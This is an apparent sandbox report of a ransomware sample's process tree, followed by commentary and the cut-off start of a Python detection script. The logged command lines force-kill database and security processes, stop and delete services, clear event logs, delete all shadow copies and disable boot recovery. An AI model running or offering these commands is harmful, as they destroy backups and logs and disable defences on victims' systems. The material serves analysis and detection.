C:\Windows\SysWOW64\cmd.exe  cmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"  (level 3)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM sqlservr.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM httpd.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM java.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM fdhost.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM fdlauncher.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM reportingservicesservice.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM softmgrlite.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM sqlbrowser.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM ssms.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM vmtoolsd.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM baidunetdisk.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM yundetectservice.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM ssclient.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM GNAupdaemon.exe /F  (level 4)
- Kills process with taskkill
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM igfxEM.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM RAVCp164.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM igfxHK.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM igfxTray.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM 360bdoctor.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM GNCEFExternal.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM PrivacyIconClient.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM UIODetect.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM AutoDealService.exe /F  (level 4)
- Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\cmd.exe  cmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""  (level 3)
C:\Windows\SysWOW64\net.exe  net stop UIODetect  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop UIODetect  (level 5)
C:\Windows\SysWOW64\net.exe  net stop VMwareHostd  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop VMwareHostd  (level 5)
C:\Windows\SysWOW64\net.exe  net stop TeamViewer8  (level 4)
- Discovers systems in the same network
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop TeamViewer8  (level 5)
C:\Windows\SysWOW64\net.exe  net stop VMUSBArbService  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop VMUSBArbService  (level 5)
C:\Windows\SysWOW64\net.exe  net stop VMAuthdService  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop VMAuthdService  (level 5)
C:\Windows\SysWOW64\net.exe  net stop wanxiao-monitor  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop wanxiao-monitor  (level 5)
C:\Windows\SysWOW64\net.exe  net stop WebAttendServer  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop WebAttendServer  (level 5)
C:\Windows\SysWOW64\net.exe  net stop mysqltransport  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop mysqltransport  (level 5)
C:\Windows\SysWOW64\net.exe  net stop VMnetDHCP  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop VMnetDHCP  (level 5)
C:\Windows\SysWOW64\net.exe  net stop Tomcat8  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop Tomcat8  (level 5)
C:\Windows\SysWOW64\net.exe  net stop "VMware NAT Service"  (level 4)
C:\Windows\SysWOW64\net.exe  net stop TeamViewer  (level 4)
- Discovers systems in the same network
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop TeamViewer  (level 5)
C:\Windows\SysWOW64\net.exe  net stop QPCore  (level 4)
C:\Windows\SysWOW64\net.exe  net stop CASLicenceServer  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop CASLicenceServer  (level 5)
C:\Windows\SysWOW64\net.exe  net stop AutoUpdateService  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop AutoUpdateService  (level 5)
C:\Windows\SysWOW64\net.exe  net stop CASWebServer  (level 4)
C:\Windows\SysWOW64\net.exe  net stop "Alibaba Security Aegis Detect Service"  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"  (level 5)
C:\Windows\SysWOW64\net.exe  net stop "Alibaba Security Aegis Update Service"  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"  (level 5)
C:\Windows\SysWOW64\net.exe  net stop "AliyunService"  (level 4)
C:\Windows\SysWOW64\net.exe  net stop CASXMLService  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop CASXMLService  (level 5)
C:\Windows\SysWOW64\net.exe  net stop AGSService  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop AGSService  (level 5)
C:\Windows\SysWOW64\net.exe  net stop RapService  (level 4)
C:\Windows\SysWOW64\cmd.exe  cmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"  (level 3)
C:\Windows\SysWOW64\net.exe  net stop HaoZipSvc  (level 4)
C:\Windows\SysWOW64\net.exe  net stop "igfxCUIService2.0.0.0"  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"  (level 5)
C:\Windows\SysWOW64\net.exe  net stop Realtek11nSU  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop Realtek11nSU  (level 5)
C:\Windows\SysWOW64\net.exe  net stop xenlite  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop xenlite  (level 5)
C:\Windows\SysWOW64\net.exe  net stop XenSvc  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop XenSvc  (level 5)
C:\Windows\SysWOW64\net.exe  net stop Apache2.2  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop Apache2.2  (level 5)
C:\Windows\SysWOW64\net.exe  net stop DellDRLogSvc  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop DellDRLogSvc  (level 5)
C:\Windows\SysWOW64\net.exe  net stop FirebirdGuardianDeafaultInstance  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance  (level 5)
C:\Windows\SysWOW64\net.exe  net stop JWEM3DBAUTORun  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop JWEM3DBAUTORun  (level 5)
C:\Windows\SysWOW64\net.exe  net stop JWRinfoClientService  (level 4)
C:\Windows\SysWOW64\net.exe  net stop JWService  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop JWService  (level 5)
C:\Windows\SysWOW64\net.exe  net stop Service2  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop Service2  (level 5)
C:\Windows\SysWOW64\net.exe  net stop RapidRecoveryAgent  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop RapidRecoveryAgent  (level 5)
C:\Windows\SysWOW64\net.exe  net stop FirebirdServerDefaultInstance  (level 4)
C:\Windows\SysWOW64\net.exe  net stop AdobeARMservice  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop AdobeARMservice  (level 5)
C:\Windows\SysWOW64\net.exe  net stop VeeamCatalogSvc  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop VeeamCatalogSvc  (level 5)
C:\Windows\SysWOW64\net.exe  net stop "Synology Drive VSS Service x64"  (level 4)
C:\Windows\SysWOW64\net.exe  net stop VeeanBackupSvc  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop VeeanBackupSvc  (level 5)
C:\Windows\SysWOW64\net.exe  net stop VeeamTransportSvc  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop VeeamTransportSvc  (level 5)
C:\Windows\SysWOW64\net.exe  net stop TPlusStdAppService1300  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop TPlusStdAppService1300  (level 5)
C:\Windows\SysWOW64\net.exe  net stop TPlusStdTaskService1300  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop TPlusStdTaskService1300  (level 5)
C:\Windows\SysWOW64\net.exe  net stop TPlusStdUpgradeService1300  (level 4)
- Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop TPlusStdUpgradeService1300  (level 5)
C:\Windows\SysWOW64\net.exe  net stop TPlusStdWebService1300  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop TPlusStdWebService1300  (level 5)
C:\Windows\SysWOW64\cmd.exe  cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"  (level 3)
C:\Windows\SysWOW64\net.exe  net stop U8WorkerService1  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop U8WorkerService1  (level 5)
C:\Windows\SysWOW64\net.exe  net stop U8WorkerService2  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop U8WorkerService2  (level 5)
C:\Windows\SysWOW64\net.exe  net stop "memcached Server"  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop "memcached Server"  (level 5)
C:\Windows\SysWOW64\net.exe  net stop Apache2.4  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop Apache2.4  (level 5)
C:\Windows\SysWOW64\net.exe  net stop UFIDAWebService  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop UFIDAWebService  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSComplianceAudit  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSComplianceAudit  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeADTopology  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeADTopology  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeAntispamUpdate  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeAntispamUpdate  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeCompliance  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeCompliance  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeDagMgmt  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeDagMgmt  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeDelivery  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeDelivery  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeDiagnostics  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeDiagnostics  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeEdgeSync  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeEdgeSync  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeFastSearch  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeFastSearch  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeFrontEndTransport  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeFrontEndTransport  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSSQL$SQL2008  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSSQL$SQL2008  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeHMRecovery  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeHMRecovery  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeHM  (level 4)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeImap4  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeImap4  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeIMAP4BE  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeIMAP4BE  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeIS  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeIS  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeMailboxAssistants  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeMailboxAssistants  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeMailboxReplication  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeMailboxReplication  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeNotificationsBroker  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeNotificationsBroker  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangePop3  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangePop3  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangePOP3BE  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangePOP3BE  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeRepl  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeRepl  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeRPC  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeRPC  (level 5)
C:\Windows\SysWOW64\net.exe  net stop MSExchangeServiceHost  (level 4)
C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 stop MSExchangeServiceHost  (level 5)
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WEVTUTIL EL3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL EL4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "AMSI/Debug"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "AirSpaceChannel"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Analytic"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Application"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "DirectShowFilterGraph"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "DirectShowPluginControl"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Els_Hyphenation/Analytic"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "EndpointMapper"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "FirstUXPerf-Analytic"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "ForwardedEvents"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "General Logging"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "HardwareEvents"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "IHM_DebugChannel"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS-GPIO/Analytic"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS-I2C/Analytic"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-GPIO2/Debug"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-GPIO2/Performance"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-I2C/Debug"3⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp.exe2⤵
- Checks computer location settings
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\system32\vssadmin.exe"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures3⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VMware NAT Service"1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWRinfoClientService1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdServerDefaultInstance1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASWebServer1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "AliyunService"1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RapService1⤵
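The tree above is the standard ransomware pre-encryption sequence: vssadmin and bcdedit to inhibit recovery, wevtutil cl to clear every log channel, and net stop / sc delete / taskkill to release the file locks held by Exchange, SQL Server and PostgreSQL. The Python below is an added example, not part of this report or of the sample, that turns that pattern into a detection over process-creation records. The record shape (pid, ppid, image, cmd), the category names and the sample events are assumptions; the events are constructed to mirror the command lines above, and the ATT&CK IDs in the comments are current technique IDs rather than the v6 names this report uses. It deliberately does not fire on a lone net stop or on wevtutil el, and it counts a net.exe command once even though its net1.exe child repeats it.

```python
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Behaviour categories (ATT&CK IDs are current technique IDs, not the v6 names used in the report).
INHIBIT_RECOVERY = "inhibit_recovery"  # T1490: vssadmin delete shadows, bcdedit recovery settings
CLEAR_LOGS = "clear_event_logs"        # T1070.001: wevtutil cl
SERVICE_STOP = "service_stop"          # T1489: net stop, sc stop/delete
PROCESS_KILL = "process_kill"          # taskkill /f, paired with T1489 in this sample

LAUNCHERS = {"cmd", "net", "net1"}     # relay processes; evidence is attributed to their origin
CHAIN_SPLIT = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")
TOKEN = re.compile(r'"[^"]*"|\S+')     # keeps quoted arguments such as "General Logging" whole

# Constructed Sysmon EID 1 / Security 4688 style records modelled on the tree above (not real telemetry).
SAMPLE_EVENTS = [
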